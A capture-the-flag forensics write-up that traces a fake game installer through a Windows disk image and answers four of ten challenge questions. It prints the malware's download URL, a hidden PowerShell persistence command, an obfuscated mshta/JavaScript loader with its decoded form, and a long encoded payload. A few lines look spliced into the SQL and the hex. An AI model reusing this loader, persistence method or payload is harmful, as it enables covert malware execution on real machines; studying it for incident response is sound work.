Counter Defensive
Challenge
- CTF: HTB Business CTF 2024: The Vault of Hope
- Name: Counter Defensive
- Category: Forensics
- Difficulty: Hard
- Points: 1000
- Description: As your crew prepares to infiltrate the vault, a critical discovery is made: an opposing faction has embedded malware within a workstation in your infrastructure, targeting invaluable strategic plans. Your task is to dissect the compromised system, trace the malware’s operational blueprint, and uncover the method of these remote attacks. Reveal how the enemy monitors and controls their malicious software. Understanding their tactics is key to securing your plans and ensuring the success of your mission to the vault. To get the flag, spawn the docker instance and answer to the questions!
Writeup
The evidence.ad1 file is associated with AccessData’s forensic software tools, specifically FTK (Forensic Toolkit) Imager. FTK Imager is a widely-used tool for digital forensics investigations. Here are the steps you can take to view and analyze an evidence.ad1 file:
Download: https://d1kpmuwb7gvu1i.cloudfront.net/AccessData_FTK_Imager_4.7.1.exe
Import into FTK Imager and Export all the files from [root] to a folder of choice.
Import into Autopsy by using Logical Files as a Data Source Type and selecting the [root] folder.
Question 1
[1/10] What time did the victim finish downloading the Black-Myth-Wukong64bit.exe file? Please, submit the epoch timestamp. (ie: 168061519)
> 1713451126
[+] Correct!
In Brave sqlite3 History database:
Downloaded from:
https://download1511.mediafire.com/rsvizt6owdfg4TUq0OMtEdAUdBHsJZJfBQS6pRh2aqRgAAzcwbZky4V7_T4CeXii84pCERW0YxlMODSKTqGDSO4zwDUNlh2fveX3WO1776cgljOdHQFxJb85EK3K9hQ31AWeIsLd8mozJKlWiZTkvuFd7tkOi7V8dUGoJDg_OPE2/6g06ggifplxkwyz/Black-Myth-Wukong64bit.exe
Defanged: hxxps[://]download1511[.]mediafire[.]com/rsvizt6owdfg4TUq0OMtEdAUdBHsJZJfBQS6pRh2aqRgAAzcwbZky4V7_T4CeXii84pCERW0YxlMODSKTqGDSO4zwDUNlh2fveX3WO1776cgljOdHQFxJb85EK3K9hQ31AWeIsLd8mozJKlWiZTkvuFd7tkOi7V8dUGoJDg_OPE2/6g06ggifplxkwyz/Black-Myth-Wukong64bit[.]exe
SQL Query:
SELECT
datetime(start_time / 1000000 + (strftime('%s', '1601-01-01')), 'unixepoch', 'localtime')
FROM downloadsOpens With Program IDs
AppXoiy6rzzu62tdihr9rgvofad4hz7tpf4m
ORDER BY start_time DESC
LIMIT 10;
Download Started: 2024-04-18 10:38:33
Download Metadata
Download Ended: 2024-04-18 10:38:46 EDT
Epoch: 1713451126
Full Path: C:\Users\IEUser\Desktop\Black-Myth-Wukong64bit.exe
Question 2
[2/10] What is the full malicious command which is run whenever the user logs in? (ignore explorer.exe, ie: nc.exe 8.8.8.8 4444)
> %PWS% -nop -w h "start "$env:temp\wct98BG.tmp""
[+] Correct!
From NTUSER.DAT, Registry Explorer - Recently Accessed Items:
Program Name Run Counter Focus Count Focus Time Last Executed
C:\Users\IEUser\Desktop\Black-Myth-Wukong64bit.exe 1 0 0d, 0h, 00m, 00s 2024-04-18 14:38:57
MSEdge 1 1 0d, 0h, 00m, 07s 2024-04-18 14:55:11
Microsoft.Windows.Explorer 16 29 0d, 0h, 09m, 04s 2024-04-18 15:09:24
{User Pinned}\TaskBar\File Explorer.lnk 16 0 0d, 0h, 00m, 00s 2024-04-18 15:09:24
Brave 4 5 0d, 0h, 06m, 14s 2024-04-18 15:10:26
{User Pinned}\TaskBar\Brave.lnk 3 0 0d, 0h, 00m, 00s 2024-04-18 15:10:26
C:\Users\IEUser\Desktop\FTK Imager\FTK Imager.exe 1 1 0d, 0h, 01m, 28s 2024-04-18 15:10:46
{Windows}\FTK Imager\FTK Imager.exe 1 32 0d, 0h, 19m, 45s 2024-04-18 15:12:32
{Windows}\TreeSizeFree-Portable\TreeSizeFree.exe 1 14 0d, 0h, 03m, 44s 2024-04-18 15:22:16
{System}\notepad.exe 4 2 0d, 0h, 00m, 11s 2024-04-18 15:35:19
NTUSER.DAT\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell:
explorer.exe, %PWS% -nop -w h "start "$env:temp\wct98BG.tmp""
Question 3
[3/10] Referring to the previous file, 'wct98BG.tmp', what is the first process that starts when the malicious file is opened? (ie: svhost.exe)
> mshta.exe
[+] Correct!
All of these files appear modified at the same time:
Custom Content Image([Multi]) [AD1]\\\.\PHYSICALDRIVE0:Basic data partition (3) [61110MB]:NONAME [NTFS]\[root]\Users\IEUser\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\DownloadMetadata
Custom Content Image([Multi]) [AD1]\\\.\PHYSICALDRIVE0:Basic data partition (3) [61110MB]:NONAME [NTFS]\[root]\Users\IEUser\AppData\Local\Temp\wct98BG.tmp
Custom Content Image([Multi]) [AD1]\\\.\PHYSICALDRIVE0:Basic data partition (3) [61110MB]:NONAME [NTFS]\[root]\Users\IEUser\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Black-Myth-Wukong64bit.exe.log
Custom Content Image([Multi]) [AD1]\\\.\PHYSICALDRIVE0:Basic data partition (3) [61110MB]:NONAME [NTFS]\[root]\Users\IEUser\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Preferences~RFda73d.TMP
Custom Content Image([Multi]) [AD1]\\\.\PHYSICALDRIVE0:Basic data partition (3) [61110MB]:NONAME [NTFS]\[root]\Users\IEUser\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db
Custom Content Image([Multi]) [AD1]\\\.\PHYSICALDRIVE0:Basic data partition (3) [61110MB]:NONAME [NTFS]\[root]\Users\IEUser\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log
Open .tmp with AppXoiy6rzzu62tdihr9rgvofad4hz7tpf4m
.tmp
C:\Users\commando\Downloads\image\UsrClass.dat:
.tmp
AppXoiy6rzzu62tdihr9rgvofad4hz7tpf4m
2024-04-18 14:40:07
UsrClass.dat: AppXoiy6rzzu62tdihr9rgvofad4hz7tpf4m\Shell\open:
a2jDtG5nIGPDsyDEkcOidSBi4bqhbiDGoWkgaMOqaMOqaMOq
UsrClass.dat: AppXoiy6rzzu62tdihr9rgvofad4hz7tpf4m\Shell\open\command:
"C:\Windows\system32\mshta.exe" "javascript:LQ1K5zw="";a1iNBf="9nyGCOq9";Th97=new ActiveXObject("WScript.Shell");Bff9D="B";alB4E=Th97.RegRead("HKCU\\software\\Classes\\Directory\\DisplayName");Uv42jf="H";for(eXbWF7Uy=alB4E.length-1;eXbWF7Uy>=0;eXbWF7Uy-=1)LQ1K5zw+=(alB4E.substr(eXbWF7Uy,1));NS1M5by="";for(MR1L5ax=0;MR1L5ax<alB4E.length;MR1L5ax+=2)NS1M5by+=String.fromCharCode(parseInt(LQ1K5zw.substr(MR1L5ax,2),16));eval(NS1M5by);hsI4L="T";"
Cleaned up:
LQ1K5zw = "";
a1iNBf = "9nyGCOq9";
Th97 = new ActiveXObject("WScript.Shell");
Bff9D = "B";
alB4E = Th97.RegRead("HKCU\\software\\Classes\\Directory\\DisplayName");
Uv42jf = "H";
for (eXbWF7Uy = alB4E.length - 1; eXbWF7Uy >= 0; eXbWF7Uy -= 1)
LQ1K5zw += (alB4E.substr(eXbWF7Uy, 1));
NS1M5by = "";
for (MR1L5ax = 0; MR1L5ax < alB4E.length; MR1L5ax += 2)
NS1M5by += String.fromCharCode(parseInt(LQ1K5zw.substr(MR1L5ax, 2), 16));
//eval(NS1M5by);
WScript.Echo(NS1M5by);
hsI4L = "T";
Question 4
[4/10] What is the value of the variable named **cRkDgAkkUElXsDMMNfwvB3** that you get after decoding the first payload? (ie: randomvalue)
> CbO8GOb9qJiK3txOD4I31x553g
[+] Correct!
UsrClass.dat:Directory\DisplayName:
b322568756e24616075647f6e622d3b64483a4d62494d60396c4c4f4a7c48567878684b3225427f4565347c6c6552395a473b4161585578474a55777a567b435a4d62454173663433363735395f6f413d4169722d3e4b47695879447e4a666f6e6b457a705530375b32225e4772783a564636734a764a70514432622d37484d637d4a7a4a48643e67777056636260776857605d4b3222795236516347776b6a4559544a6a44453f69324247584b4a7477723b622d344143753b4e663d6a74675e476445566f6b466b32276335353871333944344f4874733b496a4179326f47483f4263422d33324677766e4d4d4443785c65455b6b6147644b62536b3224745158646b6c44585c696d6445324a516b4676567a7c6a43687130396b622d364953553563717f617f484947466057735d4c6a427b322268705d654d48444a6c4550324a696a5565536a6459445f63423d40367837622d34756d665858346c6f4e6742555445513665495d616b3220397d607a795169376d47697365455851555a664c6355584a6a5a40783173756d4f422d3252797735723a5641687549687c45667b45696568655b392054417c4639416d4270744b482c6166756b322a52743b6839305e64735a5d63757345533335593f477676766150325f422d3c444a766e437440787a54617b6e457341444b4a44354f6b322e41503d6440766439336777326341405a58334452376868444746435e654a58646f463243614267465242557e622d39505a793074746e41496643614633526079647864574c6c6a5b3220344b41456831794551654371793c6052605b4936747141476a53794e4f6747685059322d38435f4c6d6a5d49534070586b44577245364149425b32214550526f473864796e483453776174613d6a72595f6344397c422d3d4b4e687954394141524c4d46636059516345376b32247c6666756e4776437f68617279667351547e457346735b6a7d62522d36794d687346375176664a755875754a4a74594164434d465d7b303a313b236b60703e4370554a5056536d646f39213d2864776e656c6e2f6035415a5a6371494c6c336b60703e4370554a5056536d64682d336b60703e4370554a5056536d646b392928247145646f63427168636e29213c236b60703e4370554a5056536d64682274737265737e2f6035415a5a6371494c6e5928247145646f63427168636e29213c2656795078327a6e4247396168747d6654782274737265737e22757536413c474825646f63427168634d6f62766e276e696274735d3b2054417c4639416d4270744b4b792b2b2656795078327a6e4247396168747d66547b3864776e656c6e22757536413c474c3656795078327a6e4247396168747d66547b303d3656795078327a6e4247396168747d66547d336b60703e4370554a5056536d6468227f666b32222d3054417c4639416d4270744b4b39222a695e6f6c5c5e65607f6c5c5c6c6568635c5c5d64366074773a78643461666f6677627932786964647236357a7a727639796f685070714c5c53756373716c634c5c5562716774766f637c5c55534b484228246165625765625e2b496a6d3f6035415a5a6371494c6b322f6035415a5a6371494c622d335843773553584668686b39222c6c6568635e2470796273635752282473656a626f485566796473614027756e6d3b496a6b3226755e4174614f62327937587963495059435873785765667938484e422d3259516550347264566541356c64426f66497a794b322f42437e69786937426872665f4c62454b6f66393843622d3a6a66577a427278385c684a61697a616b63787a4f414b322a5833503b466135316472366a717e4d466a4c61636372563951654e465536387375722d377841475a5d47645666754c6376763752426374686b3221766333575565384f4c42713d466f6c4f4d464870524735715353667f66395a6d6249315d423059536b43726b6679722d3f405a476631417444654b4846554c4560754178647b32276a7b43464e6630507639475d43577956315642664b403a4c41527643737c684a5568796647645448723172622d34563665797e6374476643486e673a5566644e495b3225403f435964674a7167484b435661427f62563372403968322d3f415c6863765773796a577c6942317c4a5976474b392926313c29223c2662473d4449654c682274737265737e2a4638387848247e6945637271607825646f63427168634d6f62766e276e696274735d3b22757536413c4749223d3b2662473d4449654c6b3864776e656c6e2a463838784c3662473d4449654c6b303d3662473d4449654c68227f666b32222d32757536413c474b322d643a557277525656324572593f4d6e60717d466e6a573b63483774695a666d427d65546d48433153324474615e622d37575556315057444a63587a4d6d465e64757d4645685b322f68675a62757a44554f4534657746393057775550763860557244486332683c655535495972395c62336033722d39463a55627649347f455d694846516d494668657b424b322864627766735a4a505f434c496972645547617b434a55525c4170527c4a43596e6838314459522d3b47776e4879476375494561387158645c485b4b32266739373666336234613165326237313933313132613430393537323562353130313362303331653835356731363135326439343663356134633463353038353561366137303031393431633633346039343162326135603266383235313631336233323533336239313165373338323831316533613035373033313131346034613162353232333330316231633560373338313032303033323162303035333433346236353230356334603430373130313361366337333633333336313731316239333031353132333660343036353366343037343333366533673537323132323237393235353563336332633165353432343567363430363937393531633560383034603337333235323630333334603363353236303132303338333032366035633231356031603465353133333732343035343831326339313932323238333232336738303833363732603261323032353531353132323462356031323132346133353336303337333236373230323663383032303830313739343661373232313662326736633735363735343631366135653360343231613330303536323363356238303332346137313235346234303230346536313630313137323463346138323165353232333833346133323667363539353660373331613032313132363332316032323265323133323632366132603335326333633562383032313663373136603331393037313135346238313433363035313631333333603732373233623430316332603733346033333263323232303360346732623930313239363460333332603360313035603132333533673261343136373660326134313632316232323163303233603233323032653461373334613333303536603260303233353336333332373663313335323667353339353031346738343262323238323560313034323360343337333260326530363831356336323360323331633663383032603231343231633232383231653530336233603162336535333930383030333730316032623530373533633163323231303632366235613033356035323530356135323565326236343361363036353633383235333330393332623263383732333262313232603335343031313130383335323133313534323232356133333737303234373231346034323830313338333531343731313262356130363461316135323464323135613532313035353232326336373361363330313932366139333832303233303335373337303333383335613563373231633233366330333935326035623461373535323663323236633432366235613033356030363567343237333334343239313732336137303233333137323730323532623332353336333262366738373233363033613131346532603233363038313260363030333367346034623931373230323663393233333331303338333032363239323262356138303030336230323260303137363232303136673932336033313332353331603463383334303932346232353231353034323662316131633332356130333730333337333530333234633163323231303632366238333033303235633637316135323130323133633560383137373260323134323162323231633232313233353563316736323533383231313736326331603463326332613460313035303337346033623636333333333230363538323830346332623033346030363663356132323235303230323032313035353233326233633132363230313367393335323363363731623533333030303736373333603162336231333132346136303737353233623266333232633832303139353632336232623234356033323432303233603265363034613561356133373830383336373730326134313637366032613431363732603261323032303033336337313333303231623232363435603737343232633130373230323733353333633930333230333161346036633561356136603230343239313632316138373932353132613367323235313567343734323731373334313830373332313363336232323832353035323560313432623367333234623230373339333833316233323660333735313032366039333033356033603465346037333460363036343633303133633367323238333467383139323263303233603830343034613636336235603433303238303163316133323736333330333663333232603263323232303260353732623033366037333560316733603134363037323660336233303433303230303730373333323161326137323432313034373135363334653560313035323832326331323132346136313336383031333236373230323467363333323660326238333161373236323637316037323534356035603561313033373233326234633132363233313263336038303663356736613232336234303560383336323337303232613732363432623737303232373663333232603833346233333930333238323263313233633531373232323935333233323461303133673933326232633837383139323432346735323663363336613232326239353230373234603337383335333930373134333337346031623130333231603567363532313461366239343931393031323531303332603534363133323532336034363632353137323661363232313567383738313932343233603232333038313636336235603463363035323232356132633336383035373530373236603667326133633132356336623561373235323362303237323664313133333032323030363632323139313661393332623132343732333163383336323632346234303630336233323233333230353432366138323730326037333336333330333633373033633661373336623433303235323362356034603465356734603830336536673932323136673661393230313632336032333031363332613733326233603736323034323433313032613460313037323037323235623262333338303032373038353160346732633732343139323832356034323230326237323361316537303633303134623660323235313933383733353231366333673232356232313833383234603262303335333930363432353165303235323631346032603933366033623132356236623561363235323567326737333235343233623561366130373233333231303260316035323361326134323732393136603733333332633931343038303637336535333233316133323464363235373231346034323830313338333531343731313262356130363461316135323464323135613532313035353232326336373361363330313932366139333832303233303335373337303333383335613563373231633233366330333935326035623461373535323663323236633432366235613033356030363567343237333334343239313732336137303233333137323730323532623332353336333262366738373233363033613131346532603233363038313260363030333367346034623931373230323663393233333331303338333032363239323262326731323364356131333560346037363633353133633260336035313263336032333163313233613433343334633333336232603162316032353232336133353465303232673531356133603637313231313032346235613033346033633637356137333034363737333460316139353830336331673467346032313460353231353832346233673035353334323263323034323437373233353663323031303736303335303733343533323032363339353361363031303433373236313460353232323534336234603560333135653360353131323163383132633163326134333832383039323433356333623333343038303162356132613232313437353336333336333636363533323363303038333331303034603633373135633033303334323334333234613561356132673233373136333563393337313833356339333731366735633933313031313432373331323363316133603132356135303737323235323833336234603633353333623632323333333263313134323131356031603667363737333032363033673035356334323132363335313132383732333163303233613633363031653333366533323832336539303732373432353237333332333530373533333462323531303830333032623160313233633930313033603935363731613460346037373232326233323661323538323332383733603331393333303633346332313531336335313160366239303363323234333137366334313131323334633661346230303160363733643432356132633630303331323230363034613930346230363233313236673532393332623667373132333163373338313260363030303033336234603467383335333930373130333366303334623461363539333332373033633361356337333262356135613531343233603935393037343830316133373533303134323162323232633667343733603832393335623360343034613236336335323362333231353233346131613336333332373636373338303833353239353930323336313930373237323531313031603165346037333460316138373933373232633360323333313633313233353431366334303260353330303631336234613133366235333432363132623565383039323433346033333663373136633332343735313433313233633333313135323534323030333660363037303335353236673132363338323731383732333163366334303260353330303032336334613563313135333133336130333737323236373530333234603567323530303930316233643432353232633130356134333364366233333231366132303633326236673330393334313261366032323531353232613360363032303566316332603737366336603363356133323737346034333636333335323032316333633432333732313160356037323332316032323265333734603561343035343831326333323367333532633363356232333031323239323232326235303363346532603162356132613232343032653630303336623663363535323933336031313632333332623263303236633332303234333134356037323232326531343933373137333563393337313533356339333731366735633933313032313432373331323333316133603132356133323736326032633663333339333633303033623660333730333032393031623362313034323330363033323930323131353632326336323467353233633663366138313563353336323932346233603363353035323467336238313532343430333464363233373363333233323832383031303732346733633732316031323531303331323464343233333560346039353260333136373830353333633132366138313563366335623830346333313433353134603733316031333133316138323564333231333033346130333833303038323930316231613930356033323432303237333464363136343461343035343831326335323932353232623667356232323463313231623260356336303131383339303637383338313232323031303465373236623930356033333132343132313660346333633134346132363432303234333134363034613460333531653261343136373731326134313637366132613431363739323261323032353461353132323467366238313460383434333564336032673461356133603637313231313032346235613033346030323362303233323030373738313131323031653135303234623367303532623163313233603231366733303035303338313363336331603363336236333033323234323337316336303732353532323533303036633461373136633433373134313333383735323664323030323930356038373733383236303330313536323032316232333332353232603632353031633130343032313133323031333332366133333165326038303733373235323132363239353132343733323134363231623567356134633464373330323231343035343831326333323932323234633132383133353263336335623830343035303032363134603562366236603233383036303737353233623630363533323363303032313631346034613033383035633667356134633464393033623561303133673933383233633330333533313530326032353263336335623831363335303631363034613033303231333560323431313366366032373032336336603467303133333332313731603262323238323433313138303664343333623232326531343933373132673563393337313833356339333731363335633660356234303033336233603332mshta.exe323038313260383433323036326039323032303336603167363333323660333234643561373231363531313134333364333330323660353037363335323139333660323532313663366131603463366730303632346233653363336233603832373231353160363033623366383037303636373337323367313332313160343335613032356131623567356034603664326233333631366131353533323134323563353331633032383133353231393336603235343032613530343032603537323031623232363439303737323239323636333332633933313334623661336236623561313135323231346132603565373730323260326530363831356336633831326135313432316238303231333236613633356337303461393335323362366336603260313433623835353232313663313230323667346233633661353333333134303134323432313134333167363730323160366530363831356338333467326033313933313236323531366333303235353031633236336339303737326332613732313037333564346039323433346132603161366033323632323337333831383033363230313034323230336237333561323034363360343239373232353339323332366133353331313033673633356337303461373233323031303535323360363035603165316036303636373333603032313233333361346334613134363230363530313132603364393036613830366530363933303136333261323538323332333034603463326332613632333031313263336532313632313132613532346130333737353232373561333233323032333533633361383233333263303234303567356031603234326231613732356237303233343130323660393338323633393233353331366736603933323032313931343032603137326331633930383034333730303335623461383035323263353333623132356335313034313137333631316737333935373339313461316333303831353133323837343331323367383039323263383734673633356337303461373233323031353033603260373033353336333333603636346134633530313238323132356236623561353239333567336132323630313139313031333537363261353134323563353331633167343139323263336335623260356330303033363034323233326331623260343438323730303335623130313333333667353233633661346337333831383031363032356034323360316030323561313031343532326233323932363338323163326036333532353332613633363335613363373236323333366236603260366132653337346035333663316031603260363538333032343735313561373231363930356134333136353037333032303034363360303136323437343334633367326133603532363738313532363030303432326333603637336236323332326034333337346037373931313234603332373030303930353730333433356039363362333231603565343330323660333136673532316335333261363235313167373034323531333239323160326231653561383234603467316038303133316131313036323233373561333233323363323236633732366235613160373233633531313132603637313139313032316138373933326231603532353335633267343032613832323237303460326235653663383234323362333231353233373030333367316037373931373538333163383033323132343333333262303231633131326732633034373733323561316533673933343132613660323235313532326133603031363234373433326238353130323033313467336338303133316132353367346032333263336333333837366038323432343734613561363233633663323232323430316033333560346037363360333132633360383033633267366132323163323231323335383232613033383233323162336535333233336337353736373238323130373235323833343138333260356232623033366032633130356134333636323737333160303030363233313236333162393232633837363238303363353331623233366339303130383233323137333237323132313433623336333333333931363534633263303033333661326038343732316031633531303331323534303233333032343037303633326232303837383133633163366132323463383331633831316235613530336233603033366235333233383030333730336337373931373532603263353333633131313331343632373135323737356134333530393033623132356330373232353135323261336030313632343734333463336732613360333332353630353135613662323032613532343030333736313336323732323333333667366035303361363231313032363238333460313137333234333333623260366130373830333139333132363235313532383736333531323239333533313032303561336235603133333231633360313434333935316032673236336236323467313338323360313333333262303230363131343234603230326237333930346033363235326232633360323230313667393233603331333235333160326236653560373234603262303335333930363435303037336039323231373332323633373533623660363330333033336139333433316133323034353137333660346039353261323136373162326035313432356339333163366331623831343037303636383335613260353031633233333038323336346036313130336333333730363532313260363332623033346035323262356037323364333733333560353035353335383237323261336032313933373136333731363731323233393232303530363032603433336338303133316133323736333336333531393034633263323238333830313332623033346037323332356035323165363034613632333134363932353133323730323534313663303035323431343233603233343037303636336235603037356031623232356132633336383035373160303334603432323238333830326238343930393034363531303331323430356033333560383132673831356336323563323332623263326033603532316335623261363030303736353039303537326332613460313039303367346032633530333231603933393233323031313331613930353232633630303233603534353037323160333030363232316330323330363338323332373032353331323239333533316235613530336235603433346035333833323431313337333235373663373236323267313338323930336334643433356036633362333334603235333736343632316130363235383231633261366032623837346739333163313235623232326235303736363134603262336330353133393131613337316035623931383035323467373533623660333234643561373231363531313134333364333330323660303135353932326330323562336033313663373039323531326134373632313334653833326336613463366335323360383034333935346037333166363538333667366036303431313339343432356130363930313132603136333332323431383536303632326338373632323331633833323236323263303230303933346332653263313036313437366330353163343035303565326337313530383036323937333531653661313335313433356136323930343233603337323737333032356534363632373231633467363332623667333039333431326139333732336234303931373335613460366335323360303430323366326034333461366035323667316333323660346734333733313232633433346135323265323130333561356136353232316333323661393338323332373032353032393732323533366336613663383233323433333231353160366131613336383334623461336330333630363538333032326232633262346139323332326733603530353033623132333133673160346331673661393330313633326132353832333233303460326236613130383233323563353031353463333133353037373230373130346133603663323231303432366235613032393036633530303233603334326233333032303037303633353132323933353232623663373033603463373338303632346232353231353134613662316136323233313031603935353231633631333233323637363331303432366231603733356130323531373232323464323033333560333536673533343134323563353232623663326132353262316338303533356330303736353031603330326332613732346130333366303339323131336336633163363236633361366239343931393031323531303331323534336234603560393036353232346336633562353233633733346734603231373235323135356339303332363039303363336236333033383034323337316338323732353532323833363236633830303233333262346139313930326739333165303237323561356234373632353238333261316032313163363232333163313233613660353037303636323035323162356132613232313038333165326034303732333234603163373038323930316236313930356033323432303333603364333237333830343037363035303233303532313532633363356238313031366738373335346233603560383332603332303231333560303431313366366032633032336336603667303133333332333331603262323231623433313138303464343331613460353035353232316338323360323532623637383035333832343235633533336232613433363131603162356132613232323033623730336333623160333335323832316238333332336331603262323237323433373237323165303334613460303131643632373236323163323331633132316336323732313231633831346233313231353134323162383232603233353032623736366035333032336336603733303135303360326235603032366035633160313033603036333237333830343032673533336331323431363334633832343032333731383335633933313033313432313035603262356031323933383435313630326038323166333234603933393233323031313732623262353239323131316737333935393038313260336532303460323133323932363338323163326036333532366738373633363034613531393334613562353036603360383034333630336337333230336333333030363538333732383232623034373235363930383739333231366633313162333030343531323232673267343032303562366033603561346332603265346536333332346132323233373034603262316231643335373032623132303131633263363033623266346030333033373131313467333733333235393234613032353031353660343331363933393134313261363139343135373338323830353436353567346436623533333132613430333531643461303430363032373133603362336039313531363631353730316235333162373231303734356232303162366233613235393433633561393431643636366634603461316235323233393436613732363035333732316335333164393536313735336038323133326231333162353132303133373238333335333335333932343734653460343337323667333432303464313437363232353334313533343232313431346336373834373532653636323432663437393533353534393534603036336034333363393032313633313136613567363634633730363232313460343035303034333733313730356532643030326234303232343237323232326132333161383039303135343233623363333033373360326436653662346339303434383232623661326035603032316133323332383238313260346231613737383737323134353036643636356233373835373234323463323232333367316236313231333035323932313532333663356336613531346332613932343434303267346536333162373533623933323035323032363634343032353030363262326230323235333036613032336137373333363332613163343032343631313031313031333034633165353431303633366336623137346233353361343133623835393538313430336336653261303332353337313132643563336739313460313734333536393036313637346034673630366334633533366033353237366139313561363735313231366338323732393530333660356033313663353335623434393136333263346333313437313435653433313031343431353133363033303139323664313133313737336230363335373237373432326333313932343736303634346339373432323036323132316131623533333131603730343334303535383238333432323232643237356236303633383239343231313333303430363033613336316235613630393031373261322d3a463838784b3229765156335157626875605e6a73324546405e48766371337c473e436038437c4b47664b624149664d6a722d3158794a56555f65587d4d6a6443653e65416b322c41577541467144687e4652747664484038737251385e4a7c45743d464e65533454516a6a72573747322d32744a646654455d46496434684946516459605e4b67486b32214071597a4868634747633d69333d6271487b675640335934614441614e48735b617f6377524d4730522d307c4957757943463c487270345f42655a774c6d6
Eval:
*mlGzUbOT0rxL6CIuwYLp="P7MBWsoqkSxNAaDAd9S0FWkxArm39m3gGChhJyQpA";hGkNPiTaVIHd4iFMUDVdjDr="7G7RzjaTT3UnFM4uLzNX1Rsx0HDftrVNxdAvAEwQL";aEn5cDjmMxUoUVZIxQ="zmFiABkFgKLsH0cN7Ls1sfxNPFEB3znPexbgQS6QVy";Hx86J="1b7109061e2a631c0604033112492836062e724b22243828550434070a13352a1a21260224793d46067429133b24772753602c7713114f2910306315144101345e4174133d3b3619442e353f130e0f305927283f1215761e191f72530f353d3f067d0d7616096534710d197c3e4b117352301b5f3c041859582c141c532d712f3f3601455a3d031011011642043a1b3633771c201f0352202b2b6005204466202502392c572a365d7b0444291b3d151f3e3f325129250312162a7c32223d242758732e664f05412778771a2d0b182823231a200e0b1f2b2844093d2f5f4b0c73033c2c245109081a321b22272422042b004b5e0713734005040d1226073d667e1f113612093c340c600d59455359746b42665b5748763d1412243514352267414d02437f27340d5d742935335338273102152a312b31280c5716594a353a273506271f4932252a1d0d6f664a491e3c49521c2f2a022e4701272a352a07516615190c2c0c172060401d4a53041b13352f4d7e56450828375149161b14193961340f5105201d295233737d111730300d6b2c063b3a10212b07534a2a2b0d0732221d23365d5b0b3d1e0c0f2e02047b7b221540032a136f123978096527402b2827385600333c02373c0634080c0f052e1d39151d0636787f25360b3a28362923120d025c0b180959377a1129252b2b71102329390d236a280b06154839210e2b0e01241301393e38173204283d3614213c357b04083723600c010a3e0f200e2b0c0510370f3c20350f672b05320b282a241512132d183a2127263a213a323a2627264a100d1d305a27273427222b0a3c23382a2825330a2c3c072c02221b1e2a0a16341b2c353e24283508762b520c283a2255050d1a344d0811342a222b0a332333107f0f3c203b0f6c11400e3120230b380e0c2d53787f10182e3c3b512503205067040837234c0c3024230e09162a0928073a0d2327040b5a3801221b1e2a25026607050f1c213a32263a120a1b382526742e1e27205a397b09191d2b3320083f2638225527283a73240830362c3c090623093e512527120d7d373c252e3f3d2256090e0d2c45213015210919492f1c3f263a3f3c1129306c301d271b3b030a0567003e35083a2b521b3f2b253e2414357f530e33024d222715201e370a2f240136762323163a25590a0132261a2f1d1512522d2608373d0c073f2b2539221536070020332b430c20053f09201e2f2401223f0c1d0170277053133d51053e2328011f2b0d032328521b3610391f7a3d0a7c13212c05050c7b23291d2b3b2b20385606303c1d2d38631a1f0a51233423283f1f3f3522792052072328391f233a22561e1e30125b251d343b2137347d0f233a7f250f1d340b6c20400c253f0d1e3719042c27391b1439037f2b367d3a2726645e203772730c2409261e3415311f5a5379260805173b5e05043a503f7416013b5b3d3900203b2622383a3226783b260658142233610b1109601e24493114060f7f38566a370d5934080c253f3d1f3b385d3126741b1529073f130c2e203b2955100f20334c34111561271e4d230f2c577d2508192e0a731a1931503c2b0d1667052b222e213a397d782b0f1b3a2852601a264673520d332c3f0e344d3c0928317b26273f752373114238350d340e2c051e2a35392213520723283603203a2260030a2705450c20063b25091a31102329390a23053b0d7c09010d1b3b7509056700061b2e3a250c0b3b2b323e263e187b180e330e04213015640909482b083822240d300a7508633b1e222a0e700e2c660704320c241425003f1452072315296413261d065a250e23270d302b310838223b3d0915363367231a31083c340b0605022932217617361739120c1b27285355050e33734c270e2b250d302b360b125607333c01160d632803323a050b1e38660704182a3f3a393e24150b2a76121b590d0f371540231a34391c3030360f2c5736223712290c7005460935302b0d270e5f2b0a3523130c297f10220c3b2b52630d09372b020d241160202b33310c28317d262c627b0a5934410c3a23310e2c1e020135392215367825152621391308701f0b2c334237110d38262011261c050f7f3332272631673004251b022f1e150652330c1b7c3d347426100c1b251522703e212c0905341e772517264131113c353b0b5719773c07300832352f300c2c051e2a183a383d221f3a3c1878022b360704203320452130153a0a27480b1f33003b3d56193333632c4121272371232801093f322a353c0826783b292a36213260000a377266341e013b0f302b2e0b381438252701282767573c32355c2a2328301b285321223a221f7b3c080c3b130c670d0e330a0422223f3c261e1d7424280f78333c3b320d7c521a31083c7d130201582b347426100c1b2515220f1b14397c5a1e2377403b7b113a202b33342123083a385719770a7c30073251232c24283f5e2b0d0722281b047b3e35250a2b39781a201911760b11153c270a1e2f273f223c23231e732260111a31080a7d0d281e5a2b0a29231524077a15261b353a257f130f20345e0a232c690e343075090007230d2119770d73340b23262c760c3b240006251876250c1b7c3d347426100c640020370561341e0961271e15742038560b0a0a3f350d735b1f0b0f2f3326273c1e36361b3525360b3a283629232b2541011e200a0c240e20610818373d1f3c257f3331012e300728440b2a3b32240630003e0b2e3c3b29147a3a353e24151b675310191106221c7e39251e2f2e212821053d1d660c336353070b0c051023271d073e367d783b29087c213478231518033a1d193759377a16371140153e212c353b25081d2e30073408093a3b710b04191202390f7f1353293628390f201432072e271a2b420a0e7e04203b33281c3c532023231e722577301d251b1126125c3b1103261b3b3d0d032328521b361039605f081f094c0b11056026411d3d1c3321200c3766060a5a0e060c25501023271d073e367c0113531f2329352279240c64021e372c02240102630818373226230f1a0b1d34290d4e3701271b3b77093c623a0552033f15262139130b7d383e18605f0a20767a34112424104133351f3c2d7f20213f1225582c410b0f3f2c25391d073e361f2312082a24151b183f3e18605b0b20775e0b1d1225111e2f2c1f2d31393b33662922770946222a02750b04051b04520f39125318203a353e241235511f16332b4f0d0e7e2a1e201e340a12317c27376607086c2c060a5127280c2c3c5c2d26007f3d0a1f3f12520f39125367050f20334c34111561271e4d230f23367a0f3020290b6023480b1802230c2c30042e0f3e3617393e3817393e7b1739415b222c344f08113428222b0a712333107d0f3c20720f6c11420e3120301d06160536182e3c3b520b051353033c28397c101e2c094d3d1e7f3e08301d0d1612003c2356062c25770608320f2f2e0d16200504082e3c3b53